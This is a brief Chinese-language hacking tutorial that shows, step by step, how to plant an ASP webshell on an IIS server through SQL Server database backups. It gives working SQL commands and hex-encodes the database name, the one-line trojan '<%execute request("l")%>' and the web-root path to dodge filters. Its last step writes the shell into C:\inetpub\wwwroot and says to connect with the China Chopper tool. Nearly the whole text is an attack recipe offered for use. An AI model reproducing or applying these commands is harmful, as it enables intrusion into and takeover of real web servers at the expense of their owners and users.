(1)首先:
declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s;
注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换
这里的数据库名字是:Newport 转换后就是:4e6577706f7274
(2)
create table [dbo].[hack520] ([cmd] [image]);
注意:这个是创建一个表
(3)
insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E);
这个在数据库中插入一句话木马:其中:0x3C2565786563757465207265717565737428226C2229253E 是木马内容的十六进制数字,也用hackbar 进行转换
这里的一句话的内容是:<%execute request("l")%> 转换之后:3C2565786563757465207265717565737428226C2229253E
(4)
declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433a5c696e65747075625c777777726f6f745c686568652e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT
这个是将带木马的文件备份到网站路径底下:其中:433a5c696e65747075625c777777726f6f745c686568652e617370是一句话木马的绝对路径的十六进制的数字,同样的也用hackbar进行转换
这里的一句话的绝对路径是:C:\inetpub\wwwroot\hehe.asp 转换之后:433a5c696e65747075625c777777726f6f745c686568652e617370
到这里,整个过程就结束了,用菜刀访问一下: